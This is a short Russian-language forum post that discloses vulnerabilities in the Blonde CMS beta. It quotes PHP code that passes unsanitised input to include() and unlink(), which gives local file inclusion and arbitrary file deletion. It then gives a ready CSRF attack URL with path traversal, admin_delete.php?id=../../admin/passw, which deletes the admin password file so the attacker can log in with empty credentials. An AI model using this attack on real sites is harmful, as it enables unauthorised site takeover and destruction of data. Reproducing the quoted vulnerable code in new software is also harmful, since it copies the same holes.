S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
/*****************************************/
// Название: Blonde CMS
// Версия: beta
// Автор Гриня (Uhty) Россия !!! 2002 год
// Подправлен к современным условиям Титов Андрей, Дмитрий Камаев
// Дата выпуска: 25 июня 2009 года
// Лицензия: Free
// URL: BlondeCMS.ru
// Услуги $: Доработка CMS под ваши нужды, создание скриптов, CMS на заказ
/******************************************/
LFI
Требуеться:MQ=OFF
Сценарий index.php
. . . . . . . . . .
if (isset($_GET ['id']))
{
$id = $_GET ['id'];
}
else
{
$id = $index;
}
if (file_exists ("engine/content/" . $id . ".php"))
{
include ("engine/content/" . $id . ".php");
}
else
{
include ('engine/404.html'); exit;
}
. . . . . . . . . .
Подключаються файлы с раширением "php",обрезать расширение можно одним из известных нам способов.
Удаление произвольного файла с правами админа
admin_delete.php
if(!isset($_GET['id'])) die('Не задана страница для удаления');
if(unlink('../engine/content/'.$_GET['id'].'.php'))
{
echo 'Страница '.$_GET['id'].' удалена.<br>';
CSRF
Просим админа перейти на сцыль admin/admin_delete.php?id=../../admin/passw
получаем админку с пустым логином и паролем…
|
Blonde CMS - 
